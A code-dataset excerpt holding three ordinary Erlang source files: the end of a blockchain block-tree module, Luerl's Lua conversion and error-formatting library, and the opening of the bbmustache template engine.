-spec add_block_in_order(block(), treedata()) -> treedata().
add_block_in_order(Block, TreeData)
when is_map(Block),
is_record(TreeData, tree_data) ->
#tree_data{block_map = BlockMap} = TreeData,
#{previous_id := PrevId, this_id := ThisId, height := Height, transactions := BlockTransactionsList} = Block,
?assertEqual(error, maps:find(ThisId, BlockMap), "this_id already exists"),
BlockTransactionsMap = transaction_map_from_list(BlockTransactionsList),
maps:map(fun transaction_list_check_if_in_order/2, BlockTransactionsMap),
%% check_that_player_ids_are_correct(BlockTransactionsMap),
FirstNonceMap = maps:map(fun get_first_nonce_in_transaction_list/2, BlockTransactionsMap),
MapEmpty = maps:size(BlockMap) == 0,
if
MapEmpty ->
?assertEqual(Height, 0, "genesis, bad height"),
?assertEqual(PrevId, undefined, "genesis, bad previous_id"),
ZeroNonceMap = maps:map(fun(_, _) -> 0 end, BlockTransactionsMap),
?assertEqual(FirstNonceMap, ZeroNonceMap, "genesis, transactions not starting with zero");
not MapEmpty ->
Result = maps:find(PrevId, BlockMap),
?assertMatch({ok, _}, Result, "cannot find previous_id"),
{ok, PrevBlock} = Result,
?assertEqual(Height, maps:get(height, PrevBlock) + 1, "bad height"),
MapFn = fun(PlayerId, _) -> 1 + search_previous_transaction_nonce_for_player(PlayerId, BlockMap, PrevId) end,
FirstNonceMapProper = maps:map(MapFn, BlockTransactionsMap),
?assertEqual(FirstNonceMap, FirstNonceMapProper, "transactions not starting with correct nonce")
end,
NewBlockMap = maps:put(ThisId, Block, BlockMap),
TreeData#tree_data{block_map = NewBlockMap}.
%% @doc Generates new block after block with PreviousBlockId.
%%
%% Puts the appropriate pending transactions inside.
-spec generate_new_block(blockid(), treedata()) -> map().
generate_new_block(PreviousBlockId, TreeData)
when is_record(TreeData, tree_data) ->
#tree_data{
block_map = BlockMap,
pending_transactions = PendingTx
} = TreeData,
if
PreviousBlockId == undefined ->
Height = 0;
PreviousBlockId /= undefined ->
Result = maps:find(PreviousBlockId, BlockMap),
?assertMatch({ok, _}, Result, "cannot find previous_id"),
{ok, PrevBlock} = Result,
Height = 1 + maps:get(height, PrevBlock)
end,
PendingPlayers = pending_transactions:get_pending_players(PendingTx),
MapFn = fun(PlayerId) ->
NextNonce = 1 + search_previous_transaction_nonce_for_player(PlayerId, BlockMap, PreviousBlockId),
{PlayerId, NextNonce}
end,
FirstNonceMap = maps:from_list(lists:map(MapFn, PendingPlayers)),
BlockTransactions = pending_transactions:get_pending_transactions(FirstNonceMap, PendingTx),
#{
previous_id => PreviousBlockId,
this_id => undefined,
height => Height,
transactions => BlockTransactions,
consensus_data => undefined
}.
-spec get_block_by_id(blockid(), treedata()) -> block().
get_block_by_id(Id, TreeData)
when is_record(TreeData, tree_data) ->
#tree_data{block_map = BlockMap} = TreeData,
Result = maps:find(Id, BlockMap),
?assertMatch({ok, _}, Result, "cannot find block by id"),
{ok, Block} = Result,
Block.
%% -spec get_all_longest_branches(treedata()) -> [block()].
%% get_all_longest_branches(TreeData)
%% when is_record(TreeData, tree_data) ->
%% #tree_data{block_map = BlockMap} = TreeData,
%% MaxHtFn = fun(_, V, Max) -> max(maps:get(height, V), Max) end,
%% MaxHt = maps:fold(MaxHtFn, 0, BlockMap),
%% MaxHtList = maps:values(maps:filter(fun(_, V) -> maps:get(height, V) == MaxHt end, BlockMap)),
%% MaxHtList.
%% -spec get_children_block_list(blockid(), treedata()) -> [block()].
%% get_children_block_list(PrevId, TreeData)
%% when is_record(TreeData, tree_data) ->
%% #tree_data{block_map = BlockMap} = TreeData,
%% maps:values(maps:filter(fun(_, B) -> maps:get(previous_id, B) == PrevId end, BlockMap)).
get_status_info(_TreeData = #tree_data{pending_transactions = Tx, block_map = Mp}) ->
pending_transactions:get_status_info(Tx) ++
[
{"blocks in tree", maps:size(Mp)}
]. | src/blocktree.erl | 0.526343 | 0.427516 | blocktree.erl | starcoder |
%% Copyright (c) 2013-2018 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% File : luerl_lib.erl
%% Author : <NAME>
%% Purpose : Luerl libraries.
%% A collection of useful functions. Those with '_' in their names
%% generate Erlang data types while those with generate Lua data types
%% (floats and binaries).
-module(luerl_lib).
-include("luerl.hrl").
-export([lua_error/2,badarg_error/3,format_error/1]).
-export([boolean_value/1,first_value/1]).
-export([number_to_list/1,to_list/1,to_lists/1,to_lists/2,
to_int/1,to_ints/1,to_ints/2]).
-export([tonumber/1,tonumber/2,tonumbers/1,tonumbers/2,tointeger/1,
tointegers/1,tointegers/2,tostring/1,tostrings/1,tostrings/2,
conv_list/2,conv_list/3]).
-spec lua_error(_,_) -> no_return().
-spec badarg_error(_,_,_) -> no_return().
lua_error(E, St) -> error({lua_error,E,St}).
badarg_error(What, Args, St) -> lua_error({badarg,What,Args}, St).
%% format_error(LuaError) -> ErrorString.
%% Some of these use same text as Lua error string, so be careful if
%% modifying them.
format_error({undefined_method, Name, Args0, Line}) ->
io_lib:format("undefined_method ~w with args: ~p on line ~p",
[Name, Args0, Line]);
format_error({badarg,Where,As}) ->
io_lib:format("badarg in ~w: ~w", [Where,As]);
format_error({method_on_nil, Key}) ->
io_lib:format("undefined method ~w on nil", [Key]);
format_error({illegal_key,Tab,Key}) ->
io_lib:format("invalid key in ~w: ~w", [Tab,Key]);
format_error({illegal_index,Where,I}) ->
io_lib:format("invalid index in ~w: ~w", [Where,I]);
format_error({illegal_val,Where,Val}) ->
io_lib:format("invalid value in ~w: ~w", [Where,Val]);
format_error({illegal_val,Val}) ->
io_lib:format("invalid value: ~w", [Val]);
format_error({illegal_comp,Where}) ->
io_lib:format("illegal comparison in ~w", [Where]);
format_error({invalid_order,Where}) -> %Keep text!
io_lib:format("invalid order function in ~w", [Where]);
format_error({undef_function,Name}) ->
io_lib:format("undefined function ~w", [Name]);
format_error({undef_method,Obj,Name}) ->
io_lib:format("undefined method in ~w: ~w", [Obj,Name]);
%% Pattern errors.
format_error(invalid_pattern) -> %Keep text!
io_lib:format("malformed pattern", []);
format_error(invalid_capture) -> %Keep text!
io_lib:format("malformed pattern", []);
format_error({invalid_char_class,C}) -> %Keep text!
io_lib:format("malformed pattern (class ~c)", [C]);
format_error(invalid_char_set) -> %Keep text!
io_lib:format("malformed pattern (missing ']')", []);
%% Illegal or undefined ops.
format_error({illegal_op,Op}) ->
io_lib:format("illegal op: ~w", [Op]);
format_error({undefined_op,Op}) ->
io_lib:format("undefined op: ~w", [Op]);
format_error({no_module,Mod}) ->
io_lib:format("module '~s' not found", [Mod]).
%% boolean_value(Rets) -> boolean().
%% first_value(Rets) -> Value | nil.
boolean_value([nil|_]) -> false;
boolean_value([false|_]) -> false;
boolean_value([_|_]) -> true;
boolean_value([]) -> false.
first_value([V|_]) -> V;
first_value([]) -> nil.
to_list(N) when is_number(N) -> number_to_list(N);
to_list(B) when is_binary(B) -> binary_to_list(B);
to_list(_) -> nil.
to_lists(As) -> to_lists(As, []).
to_lists(As, Acc) ->
to_loop(As, fun to_list/1, Acc).
to_int(N) when is_number(N) -> round(N);
to_int(B) when is_binary(B) ->
case bin_to_float(B) of
{ok,N} -> round(N);
error -> nil
end;
to_int(_) -> nil.
to_ints(As) -> to_ints(As, []).
to_ints(As, Acc) ->
to_loop(As, fun to_int/1, Acc).
%% bin_to_float(Binary) -> {ok,Number} | error.
%% str_to_float(String) -> {ok,Number} | error.
%% Use the scanner to process all allowed number syntaxes.
bin_to_float(B) -> str_to_float(binary_to_list(B)).
str_to_float(S) ->
case luerl_scan:string(S) of
{ok,[{'NUMBER',_,N}],_} -> {ok,N};
{ok,[{'+',_},{'NUMBER',_,N}],_} -> {ok,N};
{ok,[{'-',_},{'NUMBER',_,N}],_} -> {ok,-N};
_ -> error
end.
number_to_list(N) ->
I = round(N),
case I == N of %Is it an "integer"?
true -> integer_to_list(I);
false -> io_lib:write(N)
end.
%% tonumber(Arg) -> Number | nil.
%% tonumber(Arg, Base) -> Number | nil.
%% Tonumber/2 only generates "integers". Lua does it like that.
tonumber(N) when is_number(N) -> N;
tonumber(B) when is_binary(B) ->
case bin_to_float(B) of
{ok,N} -> N;
error -> nil
end;
tonumber(_) -> nil.
tonumber(A, B) ->
case conv_list([A,B], [list,integer]) of
[N0,Base] ->
case catch begin [N1] = string:tokens(N0, [9,10,11,12,13,32,160]),
{ok,list_to_integer(N1, Base)} end of
{ok,I} -> float(I);
_ -> nil
end
end.
%% tonumber(A, B) ->
%% case tonumbers([A,B]) of
%% [N1,N2] when ?IS_INTEGER(N1) ->
%% N1 * math:pow(10,N2);
%% nil -> nil
%% end.
tointeger(A) ->
case tonumber(A) of
nil -> nil;
N -> float(round(N))
end.
tonumbers(As) -> tonumbers(As, []).
tonumbers(As, Acc) ->
to_loop(As, fun tonumber/1, Acc).
tointegers(As) -> tointegers(As, []).
tointegers(As, Acc) ->
to_loop(As, fun tointeger/1, Acc).
tostring(N) when is_number(N) -> list_to_binary(number_to_list(N));
tostring(B) when is_binary(B) -> B;
tostring(_) -> nil.
tostrings(As) -> tostrings(As, []).
tostrings(As, Acc) ->
to_loop(As, fun tostring/1, Acc).
%% to_loop(List, Convert, Acc) -> List | nil.
to_loop(As, Fun, Acc) ->
lists:foldr(fun (_, nil) -> nil; %Propagate nil
(A, Ns) ->
case Fun(A) of
nil -> nil; %Propagate nil
N -> [N|Ns]
end
end, Acc, As).
%% conv_list(Args, ToTypes) -> List | nil.
%% conv_list(Args, ToTypes, Done) -> List | nil.
%% Basically a type driven foldr where we return a list or nil.
conv_list(As, Tos) -> conv_list(As, Tos, []).
conv_list(_, _, nil) -> nil; %Propagate nil
conv_list([A|As], [To|Tos], Rs0) ->
case conv_list(As, Tos, Rs0) of
nil -> nil; %Propagate nil
Rs1 ->
%% Get the right value.
Ret = case To of
%% Erlang types.
list -> to_list(A);
integer -> to_int(A);
string -> to_list(A);
%% Lua types.
lua_any -> A;
lua_integer -> tointeger(A);
lua_number -> tonumber(A);
lua_string -> tostring(A);
lua_bool -> ?IS_TRUE(A)
end,
case Ret of
nil -> nil; %Propagate nil
Ret -> [Ret|Rs1]
end
end;
conv_list([], _, Acc) -> Acc; %No more arguments, done
conv_list(_, [], Acc) -> Acc. %No more conversions, done | src/luerl_lib.erl | 0.50708 | 0.42483 | luerl_lib.erl | starcoder |
%% @copyright 2015 <NAME> All Rights Reserved.
%%
%% @doc Binary pattern match Based Mustach template engine for Erlang/OTP.
%%
%% Please refer to [the man page](http://mustache.github.io/mustache.5.html) and [the spec](https://github.com/mustache/spec) of mustache as the need arises.<br />
%%
%% Please see [this](../benchmarks/README.md) for a list of features that bbmustache supports.
%%
-module(bbmustache).
%%----------------------------------------------------------------------------------------------------------------------
%% Exported API
%%----------------------------------------------------------------------------------------------------------------------
-export([
render/2,
render/3,
parse_binary/1,
parse_binary/2,
parse_file/1,
parse_file/2,
compile/2,
compile/3,
default_value_serializer/1
]).
-export_type([
template/0,
data/0,
recursive_data/0,
option/0, % deprecated
compile_option/0,
parse_option/0,
render_option/0
]).
%%----------------------------------------------------------------------------------------------------------------------
%% Defines & Records & Types
%%----------------------------------------------------------------------------------------------------------------------
-define(PARSE_ERROR, incorrect_format).
-define(FILE_ERROR, file_not_found).
-define(CONTEXT_MISSING_ERROR(Msg), {context_missing, Msg}).
-define(IIF(Cond, TValue, FValue),
case Cond of true -> TValue; false -> FValue end).
-define(ADD(X, Y), ?IIF(X =:= <<>>, Y, [X | Y])).
-define(START_TAG, <<"{{">>).
-define(STOP_TAG, <<"}}">>).
-define(RAISE_ON_CONTEXT_MISS_ENABLED(Options),
proplists:get_bool(raise_on_context_miss, Options)).
-define(RAISE_ON_PARTIAL_MISS_ENABLED(Options),
proplists:get_bool(raise_on_partial_miss, Options)).
-define(PARSE_OPTIONS, [raise_on_partial_miss]).
-type key() :: binary().
%% Key MUST be a non-whitespace character sequence NOT containing the current closing delimiter. <br />
%%
%% In addition, `.' have a special meaning. <br />
%% (1) `parent.child' ... find the child in the parent. <br />
%% (2) `.' ... It means this. However, the type of correspond is only `[integer() | float() | binary() | string() | atom()]'. Otherwise, the behavior is undefined.
%%
-type source() :: binary().
%% If you use lamda expressions, the original text is necessary.
%%
%% ```
%% e.g.
%% template:
%% {{#lamda}}a{{b}}c{{/lamda}}
%% parse result:
%% {'#', <<"lamda">>, [<<"a">>, {'n', <<"b">>}, <<"c">>], <<"a{{b}}c">>}
%% '''
%%
%% NOTE:
%% Since the binary reference is used internally, it is not a capacitively large waste.
%% However, the greater the number of tags used, it should use the wasted memory.
-type tag() :: {n, [key()]}
| {'&', [key()]}
| {'#', [key()], [tag()], source()}
| {'^', [key()], [tag()]}
| {'>', key(), Indent :: source()}
| binary(). % plain text
-record(?MODULE,
{
data :: [tag()],
partials = [] :: [{key(), [tag()]} | key()],
%% The `{key(), [tag()]}` indicates that `key()` already parsed and `[tag()]` is the result of parsing.
%% The `key()` indicates that the file did not exist.
options = [] :: [compile_option()],
indents = [] :: [binary()],
context_stack = [] :: [data()]
}).
-opaque template() :: #?MODULE{}.
%% @see parse_binary/1
%% @see parse_file/1
-record(state,
{
dirname = <<>> :: file:filename_all(),
start = ?START_TAG :: binary(),
stop = ?STOP_TAG :: binary(),
partials = [] :: [key()],
standalone = true :: boolean()
}).
-type state() :: #state{}.
-type parse_option() :: raise_on_partial_miss.
%% - raise_on_partial_miss: If the template used in partials does not found, it will throw an exception (error).
-type compile_option() :: {key_type, atom | binary | string}
| raise_on_context_miss
| {escape_fun, fun((binary()) -> binary())}
| {value_serializer, fun((any()) -> iodata())}.
%% - key_type: Specify the type of the key in {@link data/0}. Default value is `string'.
%% - raise_on_context_miss: If key exists in template does not exist in data, it will throw an exception (error).
%% - escape_fun: Specify your own escape function.
%% - value_serializer: specify how terms are converted to iodata when templating.
-type render_option() :: compile_option() | parse_option().
%% @see compile_option/0
%% @see parse_option/0
-type option() :: compile_option().
%% This type has been deprecated since 1.6.0. It will remove in 2.0.0.
%% @see compile_option/0
-type data() :: term().
%% Beginners should consider {@link data/0} as {@link recursive_data/0}.
%% By specifying options, the type are greatly relaxed and equal to `term/0'.
%%
%% @see render/2
%% @see compile/2
-type data_key() :: atom() | binary() | string().
%% You can choose one from these as the type of key in {@link recursive_data/0}.
%% The default is `string/0'.
%% If you want to change this, you need to specify `key_type' in {@link compile_option/0}.
-ifdef(namespaced_types).
-type recursive_data() :: #{data_key() => term()} | [{data_key(), term()}].
-else.
-type recursive_data() :: [{data_key(), term()}].
-endif.
%% It is a part of {@link data/0} that can have child elements.
-type endtag() :: {endtag, {state(), [key()], LastTagSize :: non_neg_integer(), Rest :: binary(), Result :: [tag()]}}.
%%----------------------------------------------------------------------------------------------------------------------
%% Exported Functions
%%----------------------------------------------------------------------------------------------------------------------
%% @equiv render(Bin, Data, [])
-spec render(binary(), data()) -> binary().
render(Bin, Data) ->
render(Bin, Data, []).
%% @equiv compile(parse_binary(Bin), Data, Options)
-spec render(binary(), data(), [render_option()]) -> binary().
render(Bin, Data, Options) ->
{ParseOptions, CompileOptions} = lists:partition(fun(X) -> lists:member(X, ?PARSE_OPTIONS) end, Options),
compile(parse_binary(Bin, ParseOptions), Data, CompileOptions).
%% @equiv parse_binary(Bin, [])
-spec parse_binary(binary()) -> template().
parse_binary(Bin) when is_binary(Bin) ->
parse_binary(Bin, []).
%% @doc Create a {@link template/0} from a binary.
-spec parse_binary(binary(), [parse_option()]) -> template().
parse_binary(Bin, Options) ->
{State, Data} = parse(#state{}, Bin),
parse_remaining_partials(State, #?MODULE{data = Data}, Options).
%% @equiv parse_file(Filename, [])
-spec parse_file(file:filename_all()) -> template().
parse_file(Filename) ->
parse_file(Filename, []).
%% @doc Create a {@link template/0} from a file.
-spec parse_file(file:filename_all(), [parse_option()]) -> template().
parse_file(Filename, Options) ->
State = #state{dirname = filename:dirname(Filename)},
case file:read_file(Filename) of
{ok, Bin} ->
{State1, Data} = parse(State, Bin),
Template = case to_binary(filename:extension(Filename)) of
<<".mustache">> = Ext -> #?MODULE{partials = [{filename:basename(Filename, Ext), Data}], data = Data};
_ -> #?MODULE{data = Data}
end,
parse_remaining_partials(State1, Template, Options);
_ ->
error(?FILE_ERROR, [Filename, Options])
end.
%% @equiv compile(Template, Data, [])
-spec compile(template(), data()) -> binary().
compile(Template, Data) ->
compile(Template, Data, []).
%% @doc Embed the data in the template.
%%
%% ```
%% 1> Template = bbmustache:parse_binary(<<"{{name}}">>).
%% 2> bbmustache:compile(Template, #{"name" => "Alice"}).
%% <<"Alice">>
%% '''
%% Data support an associative array or a map. <br />
%% All keys MUST be same type.
-spec compile(template(), data(), [compile_option()]) -> binary().
compile(#?MODULE{data = Tags} = T, Data, Options) ->
Ret = compile_impl(Tags, Data, [], T#?MODULE{options = Options, data = []}),
iolist_to_binary(lists:reverse(Ret)).
%% @doc Default value serializer for templtated values
-spec default_value_serializer(number() | binary() | string() | atom()) -> iodata().
default_value_serializer(Integer) when is_integer(Integer) ->
list_to_binary(integer_to_list(Integer));
default_value_serializer(Float) when is_float(Float) ->
%% NOTE: It is the same behaviour as io_lib:format("~p", [Float]), but it is fast than.
%% http://www.cs.indiana.edu/~dyb/pubs/FP-Printing-PLDI96.pdf
io_lib_format:fwrite_g(Float);
default_value_serializer(Atom) when is_atom(Atom) ->
list_to_binary(atom_to_list(Atom));
default_value_serializer(X) when is_map(X); is_tuple(X) ->
error(unsupported_term, [X]);
default_value_serializer(X) ->
X.
%%----------------------------------------------------------------------------------------------------------------------
%% Internal Function
%%----------------------------------------------------------------------------------------------------------------------
%% @doc {@link compile/2}
%%
%% ATTENTION: The result is a list that is inverted.
-spec compile_impl(Template :: [tag()], data(), Result :: iodata(), template()) -> iodata().
compile_impl([], _, Result, _) ->
Result;
compile_impl([{n, Keys} | T], Data, Result, State) ->
ValueSerializer = proplists:get_value(value_serializer, State#?MODULE.options, fun default_value_serializer/1),
Value = iolist_to_binary(ValueSerializer(get_data_recursive(Keys, Data, <<>>, State))),
EscapeFun = proplists:get_value(escape_fun, State#?MODULE.options, fun escape/1),
compile_impl(T, Data, ?ADD(EscapeFun(Value), Result), State);
compile_impl([{'&', Keys} | T], Data, Result, State) ->
ValueSerializer = proplists:get_value(value_serializer, State#?MODULE.options, fun default_value_serializer/1),
compile_impl(T, Data, ?ADD(ValueSerializer(get_data_recursive(Keys, Data, <<>>, State)), Result), State);
compile_impl([{'#', Keys, Tags, Source} | T], Data, Result, State) ->
Value = get_data_recursive(Keys, Data, false, State),
NestedState = State#?MODULE{context_stack = [Data | State#?MODULE.context_stack]},
case is_recursive_data(Value) of
true ->
compile_impl(T, Data, compile_impl(Tags, Value, Result, NestedState), State);
_ when is_list(Value) ->
compile_impl(T, Data, lists:foldl(fun(X, Acc) -> compile_impl(Tags, X, Acc, NestedState) end,
Result, Value), State);
_ when Value =:= false ->
compile_impl(T, Data, Result, State);
_ when is_function(Value, 2) ->
Ret = Value(Source, fun(Text) -> render(Text, Data, State#?MODULE.options) end),
compile_impl(T, Data, ?ADD(Ret, Result), State);
_ ->
compile_impl(T, Data, compile_impl(Tags, Data, Result, State), State)
end;
compile_impl([{'^', Keys, Tags} | T], Data, Result, State) ->
Value = get_data_recursive(Keys, Data, false, State),
case Value =:= [] orelse Value =:= false of
true -> compile_impl(T, Data, compile_impl(Tags, Data, Result, State), State);
false -> compile_impl(T, Data, Result, State)
end;
compile_impl([{'>', Key, Indent} | T], Data, Result0, #?MODULE{partials = Partials} = State) ->
case proplists:get_value(Key, Partials) of
undefined ->
case ?RAISE_ON_CONTEXT_MISS_ENABLED(State#?MODULE.options) of
true -> error(?CONTEXT_MISSING_ERROR({?FILE_ERROR, Key}));
false -> compile_impl(T, Data, Result0, State)
end;
PartialT ->
Indents = State#?MODULE.indents ++ [Indent],
Result1 = compile_impl(PartialT, Data, [Indent | Result0], State#?MODULE{indents = Indents}),
compile_impl(T, Data, Result1, State)
end;
compile_impl([B1 | [_|_] = T], Data, Result, #?MODULE{indents = Indents} = State) when Indents =/= [] ->
%% NOTE: indent of partials
case byte_size(B1) > 0 andalso binary:last(B1) of
$\n -> compile_impl(T, Data, [Indents, B1 | Result], State);
_ -> compile_impl(T, Data, [B1 | Result], State)
end;
compile_impl([Bin | T], Data, Result, State) ->
compile_impl(T, Data, [Bin | Result], State).
%% @doc Parse remaining partials in State. It returns {@link template/0}.
-spec parse_remaining_partials(state(), template(), [parse_option()]) -> template().
parse_remaining_partials(#state{partials = []}, Template = #?MODULE{}, _Options) ->
Template;
parse_remaining_partials(State = #state{partials = [P | PartialKeys]}, Template = #?MODULE{partials = Partials}, Options) ->
case proplists:is_defined(P, Partials) of
true -> parse_remaining_partials(State#state{partials = PartialKeys}, Template, Options);
false ->
Filename0 = <<P/binary, ".mustache">>,
Dirname = State#state.dirname,
Filename = ?IIF(Dirname =:= <<>>, Filename0, filename:join([Dirname, Filename0])),
case file:read_file(Filename) of
{ok, Input} ->
{State1, Data} = parse(State, Input),
parse_remaining_partials(State1, Template#?MODULE{partials = [{P, Data} | Partials]}, Options);
{error, Reason} ->
case ?RAISE_ON_PARTIAL_MISS_ENABLED(Options) of
true -> error({?FILE_ERROR, P, Reason});
false -> parse_remaining_partials(State#state{partials = PartialKeys},
Template#?MODULE{partials = [P | Partials]}, Options)
end
end
end.
%% @doc Analyze the syntax of the mustache.
-spec parse(state(), binary()) -> {#state{}, [tag()]}.
parse(State0, Bin) ->
case parse1(State0, Bin, []) of
{endtag, {_, Keys, _, _, _}} ->
error({?PARSE_ERROR, {section_is_incorrect, binary_join(Keys, <<".">>)}});
{#state{partials = Partials} = State, Tags} ->
{State#state{partials = lists:usort(Partials), start = ?START_TAG, stop = ?STOP_TAG},
lists:reverse(Tags)}
end.
%% @doc Part of the `parse/1'
%%
%% ATTENTION: The result is a list that is inverted.
-spec parse1(state(), Input :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
parse1(#state{start = Start} = State, Bin, Result) ->
case binary:match(Bin, [Start, <<"\n">>]) of
nomatch -> {State, ?ADD(Bin, Result)};
{S, L} ->
Pos = S + L,
B2 = binary:part(Bin, Pos, byte_size(Bin) - Pos),
case binary:at(Bin, S) of
$\n -> parse1(State#state{standalone = true}, B2, ?ADD(binary:part(Bin, 0, Pos), Result)); % \n
_ -> parse2(State, split_tag(State, Bin), Result)
end
end.
%% @doc Part of the `parse/1'
%%
%% ATTENTION: The result is a list that is inverted.
-spec parse2(state(), iolist(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
parse2(State, [B1, B2, B3], Result) ->
case remove_space_from_head(B2) of
<<T, Tag/binary>> when T =:= $&; T =:= ${ ->
parse1(State#state{standalone = false}, B3, [{'&', keys(Tag)} | ?ADD(B1, Result)]);
<<T, Tag/binary>> when T =:= $#; T =:= $^ ->
parse_loop(State, ?IIF(T =:= $#, '#', '^'), keys(Tag), B3, [B1 | Result]);
<<"=", Tag0/binary>> ->
Tag1 = remove_space_from_tail(Tag0),
Size = byte_size(Tag1) - 1,
case Size >= 0 andalso Tag1 of
<<Tag2:Size/binary, "=">> -> parse_delimiter(State, Tag2, B3, [B1 | Result]);
_ -> error({?PARSE_ERROR, {unsupported_tag, <<"=", Tag0/binary>>}})
end;
<<"!", _/binary>> ->
parse3(State, B3, [B1 | Result]);
<<"/", Tag/binary>> ->
EndTagSize = byte_size(B2) + byte_size(State#state.start) + byte_size(State#state.stop),
{endtag, {State, keys(Tag), EndTagSize, B3, [B1 | Result]}};
<<">", Tag/binary>> ->
parse_jump(State, filename_key(Tag), B3, [B1 | Result]);
Tag ->
parse1(State#state{standalone = false}, B3, [{n, keys(Tag)} | ?ADD(B1, Result)])
end;
parse2(_, _, _) ->
error({?PARSE_ERROR, unclosed_tag}).
%% @doc Part of the `parse/1'
%%
%% it is end processing of tag that need to be considered the standalone.
-spec parse3(#state{}, binary(), [tag()]) -> {state(), [tag()]} | endtag().
parse3(State0, Post0, [Tag | Result0]) when is_tuple(Tag) ->
{State1, _, Post1, Result1} = standalone(State0, Post0, Result0),
parse1(State1, Post1, [Tag | Result1]);
parse3(State0, Post0, Result0) ->
{State1, _, Post1, Result1} = standalone(State0, Post0, Result0),
parse1(State1, Post1, Result1).
%% @doc Loop processing part of the `parse/1'
%%
%% `{{# Tag}}' or `{{^ Tag}}' corresponds to this.
-spec parse_loop(state(), '#' | '^', [key()], Input :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
parse_loop(State0, Mark, Keys, Input0, Result0) ->
{State1, _, Input1, Result1} = standalone(State0, Input0, Result0),
case parse1(State1, Input1, []) of
{endtag, {State2, Keys, LastTagSize, Rest0, LoopResult0}} ->
{State3, _, Rest1, LoopResult1} = standalone(State2, Rest0, LoopResult0),
case Mark of
'#' -> Source = binary:part(Input1, 0, byte_size(Input1) - byte_size(Rest1) - LastTagSize),
parse1(State3, Rest1, [{'#', Keys, lists:reverse(LoopResult1), Source} | Result1]);
'^' -> parse1(State3, Rest1, [{'^', Keys, lists:reverse(LoopResult1)} | Result1])
end;
{endtag, {_, OtherKeys, _, _, _}} ->
error({?PARSE_ERROR, {section_is_incorrect, binary_join(OtherKeys, <<".">>)}});
_ ->
error({?PARSE_ERROR, {section_end_tag_not_found, <<"/", (binary_join(Keys, <<".">>))/binary>>}})
end.
%% @doc Endtag part of the `parse/1'
-spec parse_jump(state(), Tag :: binary(), NextBin :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
parse_jump(State0, Tag, NextBin0, Result0) ->
{State1, Indent, NextBin1, Result1} = standalone(State0, NextBin0, Result0),
State2 = State1#state{partials = [Tag | State1#state.partials]},
parse1(State2, NextBin1, [{'>', Tag, Indent} | Result1]).
%% @doc Update delimiter part of the `parse/1'
%%
%% ParseDelimiterBin :: e.g. `{{=%% %%=}}' -> `%% %%'
-spec parse_delimiter(state(), ParseDelimiterBin :: binary(), NextBin :: binary(), Result :: [tag()]) -> {state(), [tag()]} | endtag().
parse_delimiter(State0, ParseDelimiterBin, NextBin, Result) ->
case binary:match(ParseDelimiterBin, <<"=">>) of
nomatch ->
case [X || X <- binary:split(ParseDelimiterBin, <<" ">>, [global]), X =/= <<>>] of
[Start, Stop] -> parse3(State0#state{start = Start, stop = Stop}, NextBin, Result);
_ -> error({?PARSE_ERROR, delimiters_may_not_contain_whitespaces})
end;
_ ->
error({?PARSE_ERROR, delimiters_may_not_contain_equals})
end.
%% @doc Split by the tag, it returns a list of the split binary.
%%
%% e.g.
%% ```
%% 1> split_tag(State, <<"...{{hoge}}...">>).
%% [<<"...">>, <<"hoge">>, <<"...">>]
%%
%% 2> split_tag(State, <<"...{{hoge ...">>).
%% [<<"...">>, <<"hoge ...">>]
%%
%% 3> split_tag(State, <<"...">>)
%% [<<"...">>]
%% '''
-spec split_tag(state(), binary()) -> [binary(), ...].
split_tag(#state{start = StartDelimiter, stop = StopDelimiter}, Bin) ->
case binary:match(Bin, StartDelimiter) of
nomatch ->
[Bin];
{StartPos, StartDelimiterLen} ->
PosLimit = byte_size(Bin) - StartDelimiterLen,
ShiftNum = while({true, StartPos + 1},
fun(Pos) ->
?IIF(Pos =< PosLimit
andalso binary:part(Bin, Pos, StartDelimiterLen) =:= StartDelimiter,
{true, Pos + 1}, {false, Pos})
end) - StartPos - 1,
{PreTag, X} = split_binary(Bin, StartPos + ShiftNum),
Tag0 = part(X, StartDelimiterLen, 0),
case binary:split(Tag0, StopDelimiter) of
[_] -> [PreTag, Tag0]; % not found.
[Tag, Rest] ->
IncludeStartDelimiterTag = binary:part(X, 0, byte_size(Tag) + StartDelimiterLen),
E = ?IIF(repeatedly_binary(StopDelimiter, $}),
?IIF(byte_size(Rest) > 0 andalso binary:first(Rest) =:= $}, 1, 0),
?IIF(byte_size(Tag) > 0 andalso binary:last(Tag) =:= $}, -1, 0)),
S = ?IIF(repeatedly_binary(StartDelimiter, ${),
?IIF(ShiftNum > 0, -1, 0),
?IIF(byte_size(Tag) > 0 andalso binary:first(Tag) =:= ${, 1, 0)),
case E =:= 0 orelse S =:= 0 of
true -> % {{ ... }}
[PreTag, Tag, Rest];
false -> % {{{ ... }}}
[part(PreTag, 0, min(0, S)),
part(IncludeStartDelimiterTag, max(0, S) + StartDelimiterLen - 1, min(0, E)),
part(Rest, max(0, E), 0)]
end
end
end.
%% @doc if it is standalone line, remove spaces from edge.
-spec standalone(#state{}, binary(), [tag()]) -> {#state{}, StashPre :: binary(), Post :: binary(), [tag()]}.
standalone(#state{standalone = false} = State, Post, [Pre | Result]) ->
{State, <<>>, Post, ?ADD(Pre, Result)};
standalone(#state{standalone = false} = State, Post, Result) ->
{State, <<>>, Post, Result};
standalone(State, Post0, Result0) ->
{Pre, Result1} = case Result0 =/= [] andalso hd(Result0) of
Pre0 when is_binary(Pre0) -> {Pre0, tl(Result0)};
_ -> {<<>>, Result0}
end,
case remove_indent_from_head(Pre) =:= <<>> andalso remove_indent_from_head(Post0) of
<<"\r\n", Post1/binary>> ->
{State, Pre, Post1, Result1};
<<"\n", Post1/binary>> ->
{State, Pre, Post1, Result1};
<<>> ->
{State, Pre, <<>>, Result1};
_ ->
{State#state{standalone = false}, <<>>, Post0, ?ADD(Pre, Result1)}
end.
%% @doc If the binary is repeatedly the character, return true. Otherwise, return false.
-spec repeatedly_binary(binary(), byte()) -> boolean().
repeatedly_binary(<<X, Rest/binary>>, X) ->
repeatedly_binary(Rest, X);
repeatedly_binary(<<>>, _) ->
true;
